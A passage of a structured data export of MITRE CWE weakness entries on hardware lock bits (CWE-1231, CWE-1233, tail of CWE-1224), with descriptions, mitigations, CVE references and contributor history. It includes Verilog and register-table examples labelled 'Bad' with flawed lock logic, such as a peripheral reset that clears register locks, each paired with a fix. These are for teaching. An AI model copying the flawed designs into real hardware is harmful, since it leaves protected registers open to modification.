"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Consider the example design module system verilog code shown below. register_write_once_example module is an example of register that has a write-once field defined. Bit 0 field captures the write_once_status value. This implementation can be for a register that is defined by specification to be a write-once register, since the write_once_status field gets written by input data bit 0 on first write.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "module register_write_once_example\n ( \n input [15:0] Data_in, \n input Clk, \n input ip_resetn, \n input global_resetn,\n input write,\n output reg [15:0] Data_out \n );\n\n reg Write_once_status; \n\n always @(posedge Clk or negedge ip_resetn)\n\n```\n\t if (~ip_resetn)\n\t begin\n\t\t Data_out <= 16'h0000;\n\t\t Write_once_status <= 1'b0; \n\t end \n\t else if (write & ~Write_once_status)\n\t begin\n\t\t Data_out <= Data_in & 16'hFFFE;\n\t\t Write_once_status <= Data_in[0]; // Input bit 0 sets Write_once_status\n\t end\n\t else if (~write)\n\t begin \n\t\t Data_out[15:1] <= Data_out[15:1]; \n\t\t Data_out[0] <= Write_once_status; \n\t end \n endmodule\n```",
"IntroText": null,
"Language": "Verilog",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The above example only locks further writes if write_once_status bit is written to one. So it acts as write_1-Once instead of the write-once attribute.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "module register_write_once_example \n ( \n input [15:0] Data_in, \n input Clk, \n input ip_resetn, \n input global_resetn, \n input write, \n output reg [15:0] Data_out \n ); \n\n reg Write_once_status; \n\n always @(posedge Clk or negedge ip_resetn) \n\n```\n\t if (~ip_resetn) \n\t begin \n\t\t Data_out <= 16'h0000; \n\t\t Write_once_status <= 1'b0; \n\t end \n\t else if (write & ~Write_once_status) \n\t begin \n\t\t Data_out <= Data_in & 16'hFFFE; \n\t\t Write_once_status <= 1'b1; // Write once status set on first write, independent of input \n\t end \n\t else if (~write) \n\t begin \n\t\t Data_out[15:1] <= Data_out[15:1]; \n\t\t Data_out[0] <= Write_once_status; \n\t end \n endmodule\n```",
"IntroText": null,
"Language": "Verilog",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1224"
]
] |
[] |
1231
|
Improper Prevention of Lock Bit Modification
|
Base
|
Simple
|
Stable
|
The product uses a trusted lock bit for restricting access to registers, address regions, or other resources, but the product does not prevent the value of the lock bit from being modified after it has been set.
|
In integrated circuits and hardware intellectual property (IP) cores, device configuration controls are commonly programmed after a device power reset by a trusted firmware or software module (e.g., BIOS/bootloader) and then locked from any further modification.
This behavior is commonly implemented using a trusted lock bit. When set, the lock bit disables writes to a protected set of registers or address regions. Design or coding errors in the implementation of the lock bit protection feature may allow the lock bit to be modified or cleared by software after it has been set. Attackers might be able to unlock the system and features that the bit is intended to protect.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases.",
"Phase": "Architecture and Design"
},
{
"Note": "Such issues could be introduced during implementation and identified later during Testing or System Configuration phases.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Modify Memory"
],
"Likelihood": [
"High"
],
"Note": "Registers protected by lock bit can be modified even when lock is set.",
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "\n\n - Security lock bit protections must be reviewed for design inconsistency and common weaknesses.\n\n - Security lock programming flow and lock properties must be tested in pre-silicon and post-silicon testing.\n\n",
"Effectiveness": "High",
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"Implementation",
"Testing"
],
"Strategy": null
}
] |
[
{
"Description": "chip reset clears critical read/write lock permissions for RSA function",
"Link": "https://www.cve.org/CVERecord?id=CVE-2017-6283",
"Reference": "CVE-2017-6283"
}
] | null | null |
[
"680"
] |
[
{
"Authors": null,
"Edition": null,
"ExternalReferenceID": "REF-1350",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2021",
"Publisher": null,
"Section": null,
"Title": "reglk_wrapper.sv",
"URL": "https://github.com/HACK-EVENT/hackatdac21/blob/b9ecdf6068445d76d6bee692d163fededf7a9d9b/piton/design/chip/tile/ariane/src/reglk/reglk_wrapper.sv#L80C1-L80C48",
"URLDate": "2023-09-18"
},
{
"Authors": null,
"Edition": null,
"ExternalReferenceID": "REF-1351",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2023",
"Publisher": null,
"Section": null,
"Title": "fix cwe 1199 in reglk",
"URL": "https://github.com/HACK-EVENT/hackatdac21/commit/5928add42895b57341ae8fc1f9b8351c35aed865#diff-1c2b09dd092a56e5fb2be431a3849e72ff489d2ae4f4a6bb9c0ea6b7d450135aR80",
"URLDate": "2023-09-18"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-01-15",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.0",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2020-06-25",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, Relationships, Weakness_Ordinalities",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns, Relationships",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, References",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "reviewed content changes",
"ContributionDate": "2021-10-20",
"ContributionName": "Narasimha Kumar V Mangipudi",
"ContributionOrganization": "Lattice Semiconductor",
"ContributionReleaseDate": null,
"ContributionType": "Feedback",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "provided observed example",
"ContributionDate": "2021-10-22",
"ContributionName": "Hareesh Khattri",
"ContributionOrganization": "Intel Corporation",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-06-21",
"ContributionName": "Shaza Zeitouni, Mohamadreza Rostami, Pouya Mahmoody, Ahmad-Reza Sadeghi",
"ContributionOrganization": "Technical University of Darmstadt",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-06-21",
"ContributionName": "Rahul Kande, Chen Chen, Jeyavijayan Rajendran",
"ContributionOrganization": "Texas A&M University",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2021-10-28",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Improper Implementation of Lock Protection Registers",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
}
] |
[
{
"Description": "Set the lock bit. Power cycle the device. Attempt to clear the lock bit. If the information is changed, implement a design fix. Retest. Also, attempt to indirectly clear the lock bit or bypass it.",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Manual Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Consider the example design below for a digital thermal sensor that detects overheating of the silicon and triggers system shutdown. The system critical temperature limit (CRITICAL_TEMP_LIMIT) and thermal sensor calibration (TEMP_SENSOR_CALIB) data have to be programmed by firmware, and then the register needs to be locked (TEMP_SENSOR_LOCK).",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "| Register | Field description | \n| --- | --- |\n| CRITICAL_TEMP_LIMIT | [31:8] Reserved field; Read only; Default 0 [7:0] Critical temp 0-255 Centigrade; Read-write-lock; Default 125 |\n| TEMP_SENSOR_CALIB | [31:0] Thermal sensor calibration data. Slope value used to map sensor reading to degrees Centigrade. |\n| TEMP_SENSOR_LOCK | [31:1] Reserved field; Read only; Default 0 [0] Lock bit, locks CRITICAL_TEMP_LIMIT and TEMP_SENSOR_CALIB registers; Write-1-once; Default 0 |\n| TEMP_HW_SHUTDOWN | [31:2] Reserved field; Read only; Default 0 [1] Enable hardware shutdown on critical temperature detection; Read-write; Default 0 |\n| CURRENT_TEMP | [31:8] Reserved field; Read only; Default 0 [7:0] Current Temp 0-255 Centigrade; Read-only; Default 0 |",
"IntroText": null,
"Language": "Other",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "In this example, note that if the system heats to critical temperature, the response of the system is controlled by the TEMP_HW_SHUTDOWN bit [1], which is not lockable. Thus, the intended security property of the critical temperature sensor cannot be fully protected, since software can misconfigure the TEMP_HW_SHUTDOWN register even after the lock bit is set to disable the shutdown response.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "To fix this weakness, one could change the TEMP_HW_SHUTDOWN field to be locked by TEMP_SENSOR_LOCK.\n\n| | \n|\n| TEMP_HW_SHUTDOWN | [31:2] Reserved field; Read only; Default 0 [1] Enable hardware shutdown on critical temperature detection; Read-write-Lock; Default 0 [0] Locked by TEMP_SENSOR_LOCK |",
"IntroText": null,
"Language": null,
"Nature": "Good",
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following example code is a snippet from the register locks inside the buggy OpenPiton SoC of HACK@DAC'21 [REF-1350]. Register locks help prevent SoC peripherals' registers from malicious use of resources. The registers that can potentially leak secret data are locked by register locks.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "In the vulnerable code, the reglk_mem is used for locking information. If one of its bits toggle to 1, the corresponding peripheral's registers will be locked. In the context of the HACK@DAC System-on-Chip (SoC), it is pertinent to note the existence of two distinct categories of reset signals.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "First, there is a global reset signal denoted as \"rst_ni,\" which possesses the capability to simultaneously reset all peripherals to their respective initial states.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "Second, we have peripheral-specific reset signals, such as \"rst_9,\" which exclusively reset individual peripherals back to their initial states. The administration of these reset signals is the responsibility of the reset controller module.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\talways @(posedge clk_i)\n\t\tbegin\n```\nif(~(rst_ni && ~jtag_unlock && ~rst_9))** \n\t\t\t\n\t\t\t```\n\t\t\t\tbegin \n\t\t\t\t\tfor (j=0; j < 6; j=j+1) begin \n\t\t\t\t\t\treglk_mem[j] <= 'h0;\n\t\t\t\t end\n\t end\n\t...\n```",
"IntroText": null,
"Language": "Verilog",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "In the buggy SoC architecture during HACK@DAC'21, a critical issue arises within the reset controller module. Specifically, the reset controller can inadvertently transmit a peripheral reset signal to the register lock within the user privilege domain.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "This unintentional action can result in the reset of the register locks, potentially exposing private data from all other peripherals, rendering them accessible and readable.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "To mitigate the issue, remove the extra reset signal rst_9 from the register lock if condition. [REF-1351]",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\talways @(posedge clk_i)\n\t\tbegin\n```\nif(~(rst_ni && ~jtag_unlock))** \n\t\t\t\n\t\t\t```\n\t\t\t\tbegin \n\t\t\t\t\tfor (j=0; j < 6; j=j+1) begin \n\t\t\t\t\t\treglk_mem[j] <= 'h0;\n\t\t\t\t end\n\t end\n\t...\n```",
"IntroText": null,
"Language": "Verilog",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1231"
]
] |
[] |
1233
|
Security-Sensitive Hardware Controls with Missing Lock Bit Protection
|
Base
|
Simple
|
Stable
|
The product uses a register lock bit protection mechanism, but it does not ensure that the lock bit prevents modification of system registers or controls that perform changes to important hardware system configuration.
|
Integrated circuits and hardware intellectual properties (IPs) might provide device configuration controls that need to be programmed after device power reset by a trusted firmware or software module, commonly set by BIOS/bootloader. After reset, there can be an expectation that the controls cannot be used to perform any further modification. This behavior is commonly implemented using a trusted lock bit, which can be set to disable writes to a protected set of registers or address regions. The lock protection is intended to prevent modification of certain system configuration (e.g., memory/memory protection unit configuration).
However, if the lock bit does not effectively write-protect all system registers or controls that could modify the protected system configuration, then an adversary may be able to use software to access the registers/controls and modify the protected hardware configuration.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases.",
"Phase": "Architecture and Design"
},
{
"Note": "Such issues could be introduced during implementation and identified later during Testing or System Configuration phases.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Modify Memory"
],
"Likelihood": null,
"Note": "System Configuration protected by the lock bit can be modified even when the lock is set.",
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "\n\n - Security lock bit protections must be reviewed for design inconsistency and common weaknesses.\n\n - Security lock programming flow and lock properties must be tested in pre-silicon and post-silicon testing.\n\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"Implementation",
"Testing"
],
"Strategy": null
}
] |
[
{
"Description": "Certain servers leave a write protection lock bit unset after boot, potentially allowing modification of parts of flash memory.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2018-9085",
"Reference": "CVE-2018-9085"
},
{
"Description": "Chain: chipset has a race condition (CWE-362) between when an interrupt handler detects an attempt to write-enable the BIOS (in violation of the lock bit), and when the handler resets the write-enable bit back to 0, allowing attackers to issue BIOS writes during the timing window [REF-1237].",
"Link": "https://www.cve.org/CVERecord?id=CVE-2014-8273",
"Reference": "CVE-2014-8273"
}
] | null | null |
[
"176",
"680"
] |
[
{
"Authors": [
"CERT Coordination Center"
],
"Edition": null,
"ExternalReferenceID": "REF-1237",
"Publication": null,
"PublicationDay": "05",
"PublicationMonth": "01",
"PublicationYear": "2015",
"Publisher": null,
"Section": null,
"Title": "Intel BIOS locking mechanism contains race condition that enables write protection bypass",
"URL": "https://www.kb.cert.org/vuls/id/766164/",
"URLDate": null
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-01-15",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.0",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Maintenance_Notes",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Weakness_Ordinalities",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns, Relationships",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "reviewed content changes",
"ContributionDate": "2021-10-20",
"ContributionName": "Narasimha Kumar V Mangipudi",
"ContributionOrganization": "Lattice Semiconductor",
"ContributionReleaseDate": null,
"ContributionType": "Feedback",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2021-10-28",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Improper Hardware Lock Protection for Security Sensitive Controls",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "667",
"Nature": "ChildOf",
"Ordinal": null,
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
}
] |
[
{
"Description": "Set the lock bit. Attempt to modify the information protected by the lock bit. If the information is changed, implement a design fix. Retest. Also, attempt to indirectly clear the lock bit or bypass it.",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Manual Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Consider the example design below for a digital thermal sensor that detects overheating of the silicon and triggers system shutdown. The system critical temperature limit (CRITICAL_TEMP_LIMIT) and thermal sensor calibration (TEMP_SENSOR_CALIB) data have to be programmed by the firmware.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
